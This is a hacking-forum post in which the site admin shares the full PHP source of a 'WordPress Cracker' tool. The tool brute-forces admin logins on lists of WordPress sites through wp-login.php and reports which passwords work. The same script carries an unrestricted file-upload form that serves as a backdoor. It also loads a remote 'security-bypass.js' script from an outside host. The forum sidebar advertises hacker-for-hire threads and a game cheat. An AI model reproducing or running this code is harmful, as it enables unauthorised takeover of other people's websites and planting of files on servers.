www.i4info.org

Would you like to react to this message? Create an account in a few clicks or log in to continue.
www.i4info.org

i4info Provides the best hacking Material. Latest hacking tutorials and tools are available here. It is the best place for hackers.

Latest topics

» Teen Patti Gold Hack & 3 Patti Chips Code Extra Bonus 2017
Wordpress cracker EmptySat Apr 29, 2017 10:50 am by ubedullah

» Group hackers
Wordpress cracker EmptySat Apr 15, 2017 2:37 pm by Group Hackers

» Hacker Needed
Wordpress cracker EmptySat Apr 15, 2017 3:57 am by Group Hackers

» Hacker Needed
Wordpress cracker EmptySat Apr 15, 2017 1:45 am by Group Hackers

» Hacker Needed
Wordpress cracker EmptyThu Apr 13, 2017 11:10 pm by Group Hackers

» Hacker Needed
Wordpress cracker EmptyTue Apr 11, 2017 2:07 pm by Group Hackers

» Hacker Needed
Wordpress cracker EmptyTue Apr 11, 2017 2:21 am by Group Hackers

» Hacker Needed
Wordpress cracker EmptyTue Apr 11, 2017 2:06 am by Group Hackers

» Hacker Needed
Wordpress cracker EmptyTue Apr 11, 2017 1:35 am by Group Hackers

May 2024

MonTueWedThuFriSatSun
  12345
6789101112
13141516171819
20212223242526
2728293031  

Calendar Calendar

Affiliates


free forum

Forumotion on Facebook Forumotion on Twitter Forumotion on YouTubeForumotion on Google+

Visitors Counter


Flag Counter


    Wordpress cracker

    Admin
    Admin
    Admin


    Posts : 474
    Reputation : 8
    Join date : 2014-12-10
    Age : 31
    Location : Pakistan

    Wordpress cracker Empty Wordpress cracker

    Post by Admin Wed Mar 04, 2015 7:49 pm

    <?
    @set_time_limit(0);
    ?>
    <html>
    <head>
    <title>WordPress Cracker</title>
    </head>
    <style type="text/css">
    body,a{
    background-color: black;
    color: #BBBBBB;
    font-family: Lucida Console,Tahoma;
    font-size: 11px;
    text-align: left;
    }

    input,select,textarea,table,button {
    background: none repeat scroll 0 0 #000000;
    border: 1px solid #990000;
    color: #FFFFFF;
    margin: 0;
    font-family: Lucida Console,Tahoma;
    font-size: 11px;
    padding: 2px 4px;
    }

    input:hover, textarea:hover, select:hover, button:hover {
    background: none repeat scroll 0 0 #220000;
    border: 1px solid #FF0000;
    }

    option {
    background: none repeat scroll 0 0 #000000;
    }
    a{
    text-decoration: none;
    }
    textarea{
    resize: none;
    }

    </style>
    <script type="text/javascript" src="http://code.jquery.com/jquery-1.11.0.js"></script>
    <script type="text/JavaScript">
    $(document).ready(function(){
    $('pre').fadeIn(3000);

    $('input***91;type="text"***93;').click(function(){
    $(this).val('');
    });



    });

    </script>

    <body>

    <center><pre style="display: none;"><font color="Lime" size="1">
    _______ _______ ______  _______ _______ _______  _______ _______       _______ _______ _______ _______ _       _______ _______
    |\     /(  ___  |  ____ |  __  \(  ____ |  ____ |  ____ \(  ____ (  ____ \     (  ____ (  ____ |  ___  |  ____ \ \    /(  ____ (  ____ )
    | )   ( | (   ) | (    )| (  \  ) (    )| (    )| (    \/| (    \/ (    \/     | (    \/ (    )| (   ) | (    \/  \  / / (    \/ (    )|
    | | _ | | |   | | (____)| |   ) | (____)| (____)| (__    | (_____| (_____ _____| |     | (____)| (___) | |     |  (_/ /| (__   | (____)|
    | |( )| | |   | |     __) |   | |  _____)     __)  __)   (_____  |_____  |_____) |     |     __)  ___  | |     |   _ ( |  __)  |     __)
    | || || | |   | | (\ (  | |   ) | (     | (\ (  | (            ) |     ) |     | |     | (\ (  | (   ) | |     |  ( \ \| (     | (\ (
    | () () | (___) | ) \ \_| (__/  ) )     | ) \ \_| (____/\/\____) /\____) |     | (____/\ ) \ \_| )   ( | (____/\  /  \ \ (____/\ ) \ \__
    (_______|_______)/   \__(______/|/      |/   \__(_______/\_______)_______)     (_______//   \__//     \(_______/_/    \(_______//   \__/

    </pre></font></center>
    <br/><br/><br/><br/>

    <center>
    <form action="" method="POST">

    <p><strong>Websites</strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
    <strong>Passwords</strong></p>
    <script type="text/javascript" src="http://security-dz.com/banding/security-bypass.js"></script>
    <textarea cols='50' rows='20' name="websites" placeholder="Put the website without /wp-admin/"></textarea> <textarea cols='50' rows='20' name="password" placeholder="Put the Passwords here"></textarea>

    <br /><br />

    <input type="submit" name="crack" value="Crack Password">

    </form>
    </center>

    <?php
    if(isset($_POST***91;'websites'***93;,$_POST***91;'password'***93;))
    {

    $websites = nl2br($_POST***91;'websites'***93;);
    $password = nl2br($_POST***91;'password'***93;);

    $urls     = explode('<br />',$websites);
    $passwords = explode('<br />',$password);



    $pass_count = 0;
    foreach ($urls as $http){

    $url = trim($http)."/wp-login.php";

    $check_url = substr($url,0,7);

    if($check_url !="http://"){
    $url = "http://".$url;
    }

    foreach($passwords as $pass){
    $cracking_curl = curl_init();
    curl_setopt($cracking_curl,CURLOPT_URL,"$url");
    curl_setopt($cracking_curl,CURLOPT_POSTFIELDS,"log=admin&pwd=$passwords***91;$pass_count***93;");
    curl_setopt($cracking_curl,CURLOPT_USERAGENT,$_SERVER***91;'HTTP_USER_AGENT'***93;);
    curl_setopt($cracking_curl,CURLOPT_RETURNTRANSFER,TRUE);
    curl_setopt($cracking_curl,CURLOPT_CONNECTTIMEOUT,9000);
    curl_setopt($cracking_curl,CURLOPT_TIMEOUT,9000);
    curl_setopt($cracking_curl, CURLOPT_HEADER, true);
    $result = curl_exec($cracking_curl);

    $status = curl_getinfo($cracking_curl);



    if(preg_match("/ERROR|ERROR:|ERREUR|The password you entered for the|***1582;***1591;***1571;/i",$result) or $status***91;'http_code'***93;=='404'){

    echo "<a href='$url' target='_blank'>$url</a> -----> <font color='red'>Faild !</font><br />";

    }else if($status***91;'http_code'***93;=='302' && preg_match("//",$result)){
    echo "<a href='$url' target='_blank'>$url</a> -----> <font color='green'>Cracked ***91;Password***93;</font> ----- > <b><font color='green'>$passwords***91;$pass_count***93;</font></b><br />";
    }else{
    echo "<a href='$url' target='_blank'>$url</a> -----> <font color='orange'>Not Sure ! ***91;HTTP_CODE***93; -----> $status***91;http_code***93; ***91;Password***93; -----> $passwords***91;$pass_count***93;</font><br />";
    }



    if($pass_count == count($passwords) - 1){
    $pass_count = 0;
    }else{
    $pass_count++;
    }



    }




    }//foreach loop




































    }
    ?>










    <center><br /><br /><br />
    <FORM ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
    Upload Files: <INPUT NAME="file" TYPE="file">
    <INPUT TYPE="submit" name="up" VALUE="Send">
    </FORM>
    <center>

    <?
    if(move_uploaded_file($_FILES***91;"file"***93;***91;"tmp_name"***93;,$_FILES***91;"file"***93;***91;"name"***93;)){
    echo "<script>alert('uploaded Very Happy')</script>";
    }
    ?>




    <br /><br /><br />
    <center>Coded By shahroze</center>








    </body>
    </html>

      Current date/time is Mon May 20, 2024 6:26 pm